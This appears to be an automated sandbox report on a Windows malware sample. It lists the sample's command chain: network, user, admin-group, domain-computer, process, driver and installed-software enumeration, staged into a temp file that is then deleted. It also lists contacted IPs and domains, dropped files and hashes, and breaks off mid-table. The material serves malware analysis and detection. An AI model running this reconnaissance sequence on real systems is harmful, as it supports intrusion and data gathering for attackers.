C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 2" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 3" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\cmd.exe
cmd /C "whoami /all" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\whoami.exe
whoami /all
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 4" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\cmd.exe
cmd /C "net localgroup administrators" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\net.exe
net localgroup administrators
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 5" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\cmd.exe
cmd /C "net group "domain computers" /domain" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\net.exe
net group "domain computers" /domain
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 group "domain computers" /domain
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 6" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 7" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\driverquery.exe
driverquery.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 8" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 9" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\cmd.exe
cmd /C "wmic computersystem get domain |more" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get domain
C:\Windows\system32\more.com
more
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\7AD4.bin0 > C:\Users\Admin\AppData\Local\Temp\7AD4.bin & del C:\Users\Admin\AppData\Local\Temp\7AD4.bin0"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | gogojoob.xyz | udp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| UA | 87.120.36.210:443 | N/A | tcp |
| US | 209.141.45.189:80 | 209.141.45.189 | tcp |
| RU | 213.183.56.140:8080 | 213.183.56.140 | tcp |
| US | 199.249.230.73:80 | 199.249.230.73 | tcp |
| ZA | 160.119.249.240:80 | 160.119.249.240 | tcp |
| FR | 163.172.139.104:8080 | 163.172.139.104 | tcp |
| US | 198.98.61.131:80 | 198.98.61.131 | tcp |
| HK | 91.245.255.40:80 | 91.245.255.40 | tcp |
| FR | 163.172.139.104:8080 | 163.172.139.104 | tcp |
| JP | 172.104.79.222:80 | 172.104.79.222 | tcp |
| RU | 213.183.56.140:8080 | 213.183.56.140 | tcp |
| VN | 125.212.217.197:80 | 125.212.217.197 | tcp |
| LV | 46.183.217.5:80 | 46.183.217.5 | tcp |
| RO | 89.34.27.237:9030 | 89.34.27.237 | tcp |
| HK | 91.245.255.40:80 | 91.245.255.40 | tcp |
| NL | 50.7.178.34:80 | N/A | tcp |
| US | 172.104.208.190:80 | 172.104.208.190 | tcp |
| US | 8.8.8.8:53 | unavas.xyz | udp |
| US | 8.8.8.8:53 | microsoft.com | udp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| CR | 200.122.181.78:80 | 200.122.181.78 | tcp |
| NL | 51.15.76.56:9030 | 51.15.76.56 | tcp |
| MY | 124.217.246.98:80 | 124.217.246.98 | tcp |
| DE | 178.254.35.99:80 | 178.254.35.99 | tcp |
| US | 199.249.230.114:80 | 199.249.230.114 | tcp |
| FR | 163.172.139.104:8080 | 163.172.139.104 | tcp |
| US | 67.11.225.49:8080 | | tcp |
| RO | 89.34.27.237:9030 | 89.34.27.237 | tcp |
| FR | 163.172.139.104:8080 | 163.172.139.104 | tcp |
| US | 199.249.230.142:80 | 199.249.230.142 | tcp |
| US | 199.249.230.73:80 | 199.249.230.73 | tcp |
| DE | 178.254.31.125:80 | 178.254.31.125 | tcp |
| US | 199.249.230.150:80 | 199.249.230.150 | tcp |
| US | 199.249.230.73:80 | 199.249.230.73 | tcp |
| US | 199.249.230.176:80 | 199.249.230.176 | tcp |
| NL | 93.174.93.133:80 | 93.174.93.133 | tcp |
| US | 199.249.230.115:80 | 199.249.230.115 | tcp |
| US | 198.98.61.131:80 | 198.98.61.131 | tcp |
| US | 199.249.230.102:80 | 199.249.230.102 | tcp |
| US | 199.249.230.103:80 | 199.249.230.103 | tcp |
| US | 73.222.93.39:9040 | 73.222.93.39 | tcp |
| HU | 91.219.238.221:80 | 91.219.238.221 | tcp |
| DE | 116.202.179.148:80 | 116.202.179.148 | tcp |
| SE | 193.189.100.202:80 | 193.189.100.202 | tcp |
| US | 199.249.230.103:80 | 199.249.230.103 | tcp |
| FR | 86.105.212.130:9030 | 86.105.212.130 | tcp |
| DE | 79.205.254.110:80 | 79.205.254.110 | tcp |
| ID | 195.123.237.161:80 | 195.123.237.161 | tcp |
| US | 199.249.230.168:80 | 199.249.230.168 | tcp |
| US | 199.249.230.113:80 | 199.249.230.113 | tcp |
| LV | 94.100.6.27:80 | 94.100.6.27 | tcp |
| MY | 124.217.246.98:80 | 124.217.246.98 | tcp |
| LU | 107.189.7.156:80 | 107.189.7.156 | tcp |
| US | 8.8.8.8:53 | curlmyip.net | udp |
| FI | 135.181.84.242:80 | curlmyip.net | tcp |
| US | 199.249.230.80:80 | 199.249.230.80 | tcp |
| ZA | 160.119.249.240:80 | 160.119.249.240 | tcp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| DE | 92.222.79.186:80 | 92.222.79.186 | tcp |
| ZA | 160.119.249.240:80 | 160.119.249.240 | tcp |
| DE | 179.43.141.92:80 | 179.43.141.92 | tcp |
| US | 199.249.230.176:80 | 199.249.230.176 | tcp |
| US | 185.220.103.120:80 | 185.220.103.120 | tcp |
| LU | 107.189.10.237:80 | 107.189.10.237 | tcp |
| CH | 195.206.105.217:80 | 195.206.105.217 | tcp |
| US | 199.249.230.85:80 | 199.249.230.85 | tcp |
| US | 199.249.230.176:80 | 199.249.230.176 | tcp |
| ZA | 160.119.249.223:80 | 160.119.249.223 | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| GB | 188.127.69.60:80 | | tcp |
| US | 199.249.230.144:80 | 199.249.230.144 | tcp |
| NL | 80.100.69.97:80 | 80.100.69.97 | tcp |
| US | 45.61.188.251:80 | 45.61.188.251 | tcp |
| US | 199.249.230.162:80 | 199.249.230.162 | tcp |
| CL | 37.235.52.67:80 | 37.235.52.67 | tcp |
| US | 199.249.230.106:80 | 199.249.230.106 | tcp |
| DE | 90.186.84.208:8080 | 90.186.84.208 | tcp |
| SE | 193.189.100.203:80 | 193.189.100.203 | tcp |
| US | 199.249.230.117:80 | 199.249.230.117 | tcp |
| US | 204.44.81.158:8080 | 204.44.81.158 | tcp |
| NL | 5.79.79.133:80 | 5.79.79.133 | tcp |
| US | 199.249.230.112:80 | 199.249.230.112 | tcp |
| CA | 158.69.205.247:9030 | 158.69.205.247 | tcp |
| US | 199.249.230.169:80 | 199.249.230.169 | tcp |
| DE | 185.216.179.206:80 | 185.216.179.206 | tcp |
| LV | 94.100.6.27:80 | 94.100.6.27 | tcp |
| US | 199.249.230.150:80 | 199.249.230.150 | tcp |
| KG | 91.213.233.60:80 | 91.213.233.60 | tcp |
| NL | 212.83.167.220:9030 | 212.83.167.220 | tcp |
| CA | 199.58.81.140:80 | | tcp |
| US | 199.249.230.66:80 | | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| US | 8.8.8.8:53 | curlmyip.net | udp |
| FI | 135.181.84.242:80 | curlmyip.net | tcp |
| GB | 188.127.69.60:80 | | tcp |
| CA | 199.58.81.140:80 | | tcp |
| US | 199.249.230.66:80 | | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| US | 8.8.8.8:53 | curlmyip.net | udp |
| FI | 135.181.84.242:80 | curlmyip.net | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| GB | 188.127.69.60:80 | | tcp |
| CA | 199.58.81.140:80 | | tcp |
| US | 199.249.230.66:80 | | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| US | 8.8.8.8:53 | curlmyip.net | udp |
| FI | 135.181.84.242:80 | curlmyip.net | tcp |
| GB | 188.127.69.60:80 | | tcp |
| CA | 199.58.81.140:80 | | tcp |
| US | 199.249.230.66:80 | | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| US | 8.8.8.8:53 | microsoft.com | udp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| US | 8.8.8.8:53 | curlmyip.net | udp |
| FI | 135.181.84.242:80 | curlmyip.net | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| GB | 188.127.69.60:80 | | tcp |
| CA | 199.58.81.140:80 | | tcp |
| US | 199.249.230.66:80 | | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| US | 8.8.8.8:53 | curlmyip.net | udp |
| FI | 135.181.84.242:80 | curlmyip.net | tcp |
| GB | 188.127.69.60:80 | | tcp |
| CA | 199.58.81.140:80 | | tcp |
| US | 199.249.230.66:80 | | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
Files
memory/304-54-0x000000000052E000-0x0000000000539000-memory.dmp
memory/304-55-0x000000000052E000-0x0000000000539000-memory.dmp
memory/304-56-0x0000000000230000-0x000000000023C000-memory.dmp
memory/304-58-0x0000000001000000-0x000000000106F000-memory.dmp
memory/304-57-0x0000000075C41000-0x0000000075C43000-memory.dmp
memory/304-59-0x0000000000240000-0x0000000000250000-memory.dmp
memory/304-65-0x0000000000270000-0x0000000000272000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\w8w9llr\imagestore.dat
| MD5 | db9b19619a023808d90d8c33b3445017 |
| SHA1 | 382a05ad8f0efbcec4631b004a9eb1c0947c47cd |
| SHA256 | 37483ec746105f9d6669ad229d4f4b04098a6e7e90584d7adfc188f7866a066c |
| SHA512 | 1af7e5c6f0fe074a93da9c6e8cca7afd9e07c27870c69aacd49eb79acca74d349df12dc41589c8f2fc3c408915ccf6f2a321e50856e42cbec6736aed8ad13658 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 70f11d88a2c034021c1964b0d3553522 |
| SHA1 | 45dd2e2a689af1e23c637d5491bbf03036b96131 |
| SHA256 | 14b68c058cd1f1971bc1888b1506989df308226167e4b6128c1facaeef053c2e |
| SHA512 | 46a735df639d4fdc413325a4f4d29f6894ab05c86335df0055593be171dfe4c72ebdfb13b4e1901603f8425f328c81a2072e338e79c5393a2b1ff5a898a39e48 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
| MD5 | a93dac0c8b0a75f5c7dd20a9325f5d86 |
| SHA1 | eabf861ebe7cc22e938444e1c12e4e006190fe54 |
| SHA256 | f31460e823be9de1ce494a4837112166b5c52d3bb3b9b543db2ab36d7fb9fed4 |
| SHA512 | 27e29188dd432a3bef5a6b79b5546e3ffdedbb724def76ecab6e9ff72ef02a2124bd0bde728752e78e79512618ade0962eb7da52fdc666d44803a21f3a7f3f34 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
| MD5 | 54e9306f95f32e50ccd58af19753d929 |
| SHA1 | eab9457321f34d4dcf7d4a0ac83edc9131bf7c57 |
| SHA256 | 45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72 |
| SHA512 | 8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3OL83HNN\favicon[1].ico
| MD5 | a976d227e5d1dcf62f5f7e623211dd1b |
| SHA1 | a2a9dc1abdd3d888484678663928cb024c359ee6 |
| SHA256 | 66332859bd8e3441a019e073a318b62a47014ba244121301034b510dc7532271 |
| SHA512 | 6754d545f2ce095cfa1fa7ca9e3223f89e37726ee7e541ebcf3e209e18b2602f3be8677598cb30d697327a63de032c11dbf8ef7ad7889a79c488a21044c1cb3f |
memory/1292-71-0x000007FEFC1E1000-0x000007FEFC1E3000-memory.dmp
memory/1292-72-0x000007FEF2B00000-0x000007FEF365D000-memory.dmp
memory/1292-73-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp
memory/1292-74-0x00000000025B0000-0x00000000025B2000-memory.dmp
memory/1292-75-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp
memory/1292-76-0x00000000025B2000-0x00000000025B4000-memory.dmp
memory/1292-77-0x00000000025B4000-0x00000000025B7000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | d61c2a7edf4b81f7be45de1e33d9fb64 |
| SHA1 | 505daf37edd55e9efe6ad032662bfdaaa788651c |
| SHA256 | 2db6ee78cff8ae688651e0b9c188bea826ee6ba5fa408eae308c803550fab37d |
| SHA512 | 3ca9955f960cead2ffe589b3e1b6c1fc699fbd8ba66ea46dc9f7811473482e7e00c49ffbaca9a3bf691643a0c15dfd3d5a5e1fb974b46288f74968df3558bce3 |
memory/1640-80-0x000007FEF2B00000-0x000007FEF365D000-memory.dmp
memory/1292-81-0x00000000025BB000-0x00000000025DA000-memory.dmp
memory/1640-83-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp
memory/1640-84-0x0000000002340000-0x0000000002342000-memory.dmp
memory/1640-85-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp
memory/1640-86-0x0000000002342000-0x0000000002344000-memory.dmp
memory/1640-87-0x0000000002344000-0x0000000002347000-memory.dmp
memory/1640-82-0x000000001B830000-0x000000001BB2F000-memory.dmp
memory/1640-88-0x000000000234B000-0x000000000236A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | d61c2a7edf4b81f7be45de1e33d9fb64 |
| SHA1 | 505daf37edd55e9efe6ad032662bfdaaa788651c |
| SHA256 | 2db6ee78cff8ae688651e0b9c188bea826ee6ba5fa408eae308c803550fab37d |
| SHA512 | 3ca9955f960cead2ffe589b3e1b6c1fc699fbd8ba66ea46dc9f7811473482e7e00c49ffbaca9a3bf691643a0c15dfd3d5a5e1fb974b46288f74968df3558bce3 |
memory/844-91-0x000007FEF2B00000-0x000007FEF365D000-memory.dmp
memory/844-92-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp
memory/844-93-0x0000000002690000-0x0000000002692000-memory.dmp
memory/844-94-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp
memory/844-95-0x0000000002692000-0x0000000002694000-memory.dmp
memory/844-96-0x0000000002694000-0x0000000002697000-memory.dmp
memory/844-97-0x000000000269B000-0x00000000026BA000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\cjxp6gcr.cmdline
| MD5 | 1f137f80c2a51641b19c6ab62739c7c7 |
| SHA1 | 780317fa83c473a066a2b950440cc487c922e793 |
| SHA256 | e8e9879453ff3967159dae041ea0269c2de114e6aeb7946098e332b7ff36854e |
| SHA512 | 4f8ee12f4ba7d25f2684a4ca844573366af8c7bbb811171178fff1f47643233311697f27c5bc8839ce230757bab3dcf7ae59163a280a63ccb7bb99cc7b927374 |
\??\c:\Users\Admin\AppData\Local\Temp\cjxp6gcr.0.cs
| MD5 | 7fceb996f934e8bda687cdd2bd46a9a7 |
| SHA1 | 81e1edbcca6438daaccc3845fa0e3b1a6cff17a6 |
| SHA256 | fa53f8174510a9ad008973d47798f022b681e1764a15134efd2004980f23bb6e |
| SHA512 | 6aa6253527b72c0605859180887ff19cd96412cb816ec02e832d4a0e0cbcd03d9cc580112e4e2055d4a9ede850c1a339df974371f992b0b9b73e54e137610205 |
\??\c:\Users\Admin\AppData\Local\Temp\CSCFFA3.tmp
| MD5 | 00ab387cf5240f9e079347f0fc570b9d |
| SHA1 | 0158ed109b684079468cd3c3e46baec04e623a3c |
| SHA256 | 65cae3a9bffd254b5f9246019f3cbd0bc0fc5df4bbeb4930d28912bdf030f5c9 |
| SHA512 | 1c3c00836c38e1b96314f2ae1aabfa3de362acedc035b74a2f314d347b1389e1011a33c47f67812f5a84d5a549ca31793b871996347d0b80c698feca0e46bce2 |
C:\Users\Admin\AppData\Local\Temp\RESFFA4.tmp
| MD5 | b56a0bebf61835e3f214da735ae84bf4 |
| SHA1 | 040276c15a8a87684e1ec3abd39997c9aba75114 |
| SHA256 | 8b016763de40b335e30228711944cf55dcc6456fc3d810f9ed97a7074c3baeeb |
| SHA512 | 7d32dc5daa6a6b0ae389bfad8646563e694914afc36785a65247939b28420a7aacaf8e078301dbada943ae62da54dd88e99a225f1e7170838cfdee652fd10fea |
C:\Users\Admin\AppData\Local\Temp\cjxp6gcr.dll
| MD5 | 3063266ffdcfe2c4a0939b06ea3717b4 |
| SHA1 | b94790c56db20b47ae1b6519a05417923c0efa42 |
| SHA256 | eeaefce42beb6ba7172bf5d75002ba232dd1e59daabc0fc1a43ce03f53b55b74 |
| SHA512 | b31d97e6b6cdb3604b519d9c554deaaaa295b437a212a489b6262d44b9c43ba20918d2ae4fc6c060e1652e6390fbeb2ab964c64be93a4e6894bd60fd0c74a717 |
C:\Users\Admin\AppData\Local\Temp\cjxp6gcr.pdb
| MD5 | 355cfdfd67fae9c87ea6e1a3955427ee |
| SHA1 | 88608dad2ee5c8bd4b6d65645571c76135d1d684 |
| SHA256 | 95be07ab865d625257dd8669b2bf95e1cf7a73022b545082d37c1b50d509b647 |
| SHA512 | 480cee09bb4440dda1e6ef244e0eb085dfaa44d7fcab65e067c8bde9fc8de2022d0b29d6407de358e1dd52aeb0c4bceb78fd30e15d625ee2c828f84288f2c787 |
\??\c:\Users\Admin\AppData\Local\Temp\adua5uv0.cmdline
| MD5 | d456f4da9b60e70744fc1d3492130437 |
| SHA1 | e721393fd973986ae5e965f2ced2506c54708e2e |
| SHA256 | bbe537ea5aba3262de669dd6aba27be1e28707f046ade852a3a3082a19c0e541 |
| SHA512 | 55930d623887eafbd93cfe8da972227bb4f159ecfc300562450f72974525193d65cefce6ac0d2e4b550e7e1c8b29192b24a622e98ffa563d33d987ad53737e7d |
\??\c:\Users\Admin\AppData\Local\Temp\adua5uv0.0.cs
| MD5 | 697f16b8c6892082559d8a17db343865 |
| SHA1 | 246d6ba1419478be7915e78b61525da894321fb9 |
| SHA256 | 518ab091348dea4f49183958185b3d42b5ddb191007bab25b6e69ff6ec923f1f |
| SHA512 | 801a428c5dd5ff4a745923914505dcf5a9929b3dbfc5bb5f6320996ad849fa42dc75ac53a432dd01103e0d6db2269583351f14b189a76a066d6f940ff79d38d6 |
\??\c:\Users\Admin\AppData\Local\Temp\CSC20.tmp
| MD5 | 32ef79ada32c2c2aac964c292c338d9c |
| SHA1 | a847f9e830ee32eb54aedae7a5a6152ffb78dd95 |
| SHA256 | dba94e58c55d3e1e42a2dcbe68fbd319702714e587ea8e19ef9427b9c1b740ee |
| SHA512 | 614c694b3bf0dc31b0b54072340c181cc710e9acd425c246eabe1dae05bb124d0413fbeed4541c60e434122e5302c1dbc1f104013f5ba596d0a0b1ddd76c6265 |
C:\Users\Admin\AppData\Local\Temp\RES21.tmp
| MD5 | 367cc1ea803e51f6373873e2fae1b614 |
| SHA1 | 0716aeb25b03d2039b52d4858a72dd1f30141d6e |
| SHA256 | 49d20edbe5ede206071a7071a93616ea281154046845f4a702eb42cb722de6a1 |
| SHA512 | e6bdbabc0c8dc0ad4f794e43abc72480cd9ab6c0d4636eedf48baf5661eb7d0a4a38878fb8322f23330f4b3314dcc44bb846cbc2ac351aa5704f156cad647799 |
C:\Users\Admin\AppData\Local\Temp\adua5uv0.dll
| MD5 | 1128201d45c30519cccd84ddd9b0d894 |
| SHA1 | d505ec80cef79a255949c86c88f6d75770c1bbfd |
| SHA256 | 653dda67447686b2d7d6c91d0183920461fb38698d3a4cec849f71ecfa5ac302 |
| SHA512 | eb3835b33db10c7b29fe95b4857888fe5f08892a1fdc7c8552820e4db3230132880df06c5a6643d0024e36e4572faab92bcd06dd74fccf6d827297dfc88091df |
C:\Users\Admin\AppData\Local\Temp\adua5uv0.pdb
| MD5 | 8071cc09c71db6ec209768f4debc80ee |
| SHA1 | 4916a8d80d95e1cd4a505d8197cd42faca4ca8cf |
| SHA256 | dd503ab6fceccddb655c51bb7d361cf7eb6cb0f91ab586f583b966f09b1a068f |
| SHA512 | c2b07e16ab7fec5b02075c2aa5d731a038f447d2c4d0da35e84434234ed6a2533b70cc8e1883531f6edc912ad2a6b6d993e6a74df2b321ae8b153de46fc57b5c |
memory/1292-110-0x000000001B660000-0x000000001B673000-memory.dmp
memory/304-111-0x00000000002D0000-0x0000000000311000-memory.dmp
memory/1368-112-0x00000000029B0000-0x00000000029C5000-memory.dmp
memory/1368-718-0x0000000002990000-0x00000000029A5000-memory.dmp
C:\Users\Admin\~Columnsoftware.DDF
| MD5 | 3e25bda21d35fe79e726d526d9ceb030 |
| SHA1 | e9e8d6070068e019b5243b6cd4d5e24b12dd8796 |
| SHA256 | 8f6e21ab45d1631d565b15bd8367d6a1702219c3c21d95200f7c2b37dd2d5a34 |
| SHA512 | 6b48ef106bccf877635c496f7d25c72f75993311f7f1189e0437c16616b26c9d62c9dddd7f8962dd5bf349f6125f93c124376f634231ef768f56c5a0280c308e |
C:\Users\Admin\~Columnsoftware_LAYOUT.INF
| MD5 | 7aacfc1d6af97be98a41d4e8d7087332 |
| SHA1 | 75770af6f11a2aed72c96d0996818fa6e3f0780d |
| SHA256 | fef82285bf4b68a83b4a2d011a203e170be145ce850ec6cf6985616dbf61675c |
| SHA512 | 07ee854501c49af974691f261dc88a52074133ae33382f554b2e6c026fea3dd8778ba404780e4ea8c4089d70ae4d0e5a7ea66d70d08ab2bbdda292d4fdefd518 |
C:\Users\Admin\~Columnsoftware.RPT
| MD5 | 93d6c414c2c5115499497110d7c4bb8e |
| SHA1 | 22b1c6cf1dbf3be56bd810c1306eec7dd930edb4 |
| SHA256 | 085b77cd3e8eceae456842612c1aed3608b6332d0809dd1c2c24b0468f8926dd |
| SHA512 | f746af12b5606bea7535482842bfb1e0513efdf999e7fa378e077eabe6bb69ac448aa5bfc2d7dacb54daf5903174f169fb082e9ddcfd210ff3220f9db5447fec |
C:\Users\Admin\~Columnsoftware.CAB
| MD5 | 3c234cb15748c957069af8ae2cc42039 |
| SHA1 | 1d9faa7321914af5ad01e74ba6a3dd1a496cd68d |
| SHA256 | fc7ade38fe0eaebfe886ff998593ee34f5d0d724274eb876ffb30d0f36807da1 |
| SHA512 | 27cb59f24874705d9d7c8d080a58d5fb270c0ab34d435a81f6d13639807a4a08d665d4ba3076285c178d9d7cf78d897355660fac6db15e7ff29f5de837cf4222 |
C:\Users\Admin\AppData\Local\Temp\5BA0.bin0
| MD5 | 768165e0abf16bf3056836d5431a7296 |
| SHA1 | 9fb3196be60e49bfc319ebd9e0b103954d711e34 |
| SHA256 | b44c505b721e93e2a596577018cc65b993cd632b9fe7620a4b3db54031afff5d |
| SHA512 | 1250ec40ba20f39a5b9a3aafd45c63cb6f1bf48b89acce1f885470c936fb48a803081943c68458ba1adce92d5fe79d3e45682285f56ecb29884d41974269992d |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 5f5179cca63bdf7f82bf9868710984e7 |
| SHA1 | 899dcdea948341125761e3b5a6c99a8e868eb937 |
| SHA256 | e9a9c4f722bb617c5b880e30261e134af86d847a64891123ab27a888aac2fb72 |
| SHA512 | 87a2778d2fa6ca4922db3599a95032b59c18ccaee4fa3e8dba9e582d73c40a7d1cdc133097f4ff359cd8f49bc10b906c648ee0ade084fdd616d4c2801a4840d7 |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 5f5179cca63bdf7f82bf9868710984e7 |
| SHA1 | 899dcdea948341125761e3b5a6c99a8e868eb937 |
| SHA256 | e9a9c4f722bb617c5b880e30261e134af86d847a64891123ab27a888aac2fb72 |
| SHA512 | 87a2778d2fa6ca4922db3599a95032b59c18ccaee4fa3e8dba9e582d73c40a7d1cdc133097f4ff359cd8f49bc10b906c648ee0ade084fdd616d4c2801a4840d7 |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | f730411a9a43c7d05a451c3b646a4b86 |
| SHA1 | 5f79b8f800b68fa4509f21a4ef3bf61922d515dc |
| SHA256 | bd1fa4e7be0fa6ada515d1b2bd2cfeeb64db25d4ada0c6e19af93ddf79a0dd7f |
| SHA512 | 043716c1627d66ac7a61d39b09e6049fee39f66cd5e11dcbcc7304a22704a3f964e45463bdcc21f862f8689263cfc2ee85a69c978be8089d8cce4c28ebcd7a43 |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | f730411a9a43c7d05a451c3b646a4b86 |
| SHA1 | 5f79b8f800b68fa4509f21a4ef3bf61922d515dc |
| SHA256 | bd1fa4e7be0fa6ada515d1b2bd2cfeeb64db25d4ada0c6e19af93ddf79a0dd7f |
| SHA512 | 043716c1627d66ac7a61d39b09e6049fee39f66cd5e11dcbcc7304a22704a3f964e45463bdcc21f862f8689263cfc2ee85a69c978be8089d8cce4c28ebcd7a43 |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 77c4ec68d22d4a45b126647d83f0c387 |
| SHA1 | dd09bf1f2448a85096dc09c5b8305f25bd979f57 |
| SHA256 | f6daa660c5ec9e46b1fbf17fccfbbc183e0d8b79b1539245a92b234a53cad8f6 |
| SHA512 | 0917856769fd27ae41cf25e067f7777cf7b06792eb4ebe7d4fb93661157cb6c5cfa4ab69079336e0526656b121be58b0f770efddf1b8e533b2cca26389a43dfc |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 77c4ec68d22d4a45b126647d83f0c387 |
| SHA1 | dd09bf1f2448a85096dc09c5b8305f25bd979f57 |
| SHA256 | f6daa660c5ec9e46b1fbf17fccfbbc183e0d8b79b1539245a92b234a53cad8f6 |
| SHA512 | 0917856769fd27ae41cf25e067f7777cf7b06792eb4ebe7d4fb93661157cb6c5cfa4ab69079336e0526656b121be58b0f770efddf1b8e533b2cca26389a43dfc |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 50123f5383e92fb265949158b9972f0b |
| SHA1 | d75e071a98c9ebdd48e70b0d4bef171d9df5611d |
| SHA256 | 63bd913ca898b45989302b672c93dc475ca7ae3e119ca0abd0218fd1b965fdaa |
| SHA512 | 581838e60d44530dac746e90acd912cfab6ad78b0f39d842ed2b230976297a950deaa3f928743fff933239d168c695cbff3cd4bb8b7ca886efac3076e732a97f |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 50123f5383e92fb265949158b9972f0b |
| SHA1 | d75e071a98c9ebdd48e70b0d4bef171d9df5611d |
| SHA256 | 63bd913ca898b45989302b672c93dc475ca7ae3e119ca0abd0218fd1b965fdaa |
| SHA512 | 581838e60d44530dac746e90acd912cfab6ad78b0f39d842ed2b230976297a950deaa3f928743fff933239d168c695cbff3cd4bb8b7ca886efac3076e732a97f |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | cad53cca46626dd11590e9a0011847f0 |
| SHA1 | abeddf2e3e6b4e503281e152270c872ba2ad90af |
| SHA256 | 156eddafe79d7cbe2555ad9abc518d3c7de71c1269d98e7f6074065f6ada29b2 |
| SHA512 | 126d8381c847ac1acf0152787043068159b3870cbb9482e7c57ee1a4581992d34a2c915693ddb48a4ece045ef5e179f7451207a6133a2958e733404bde867564 |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | cad53cca46626dd11590e9a0011847f0 |
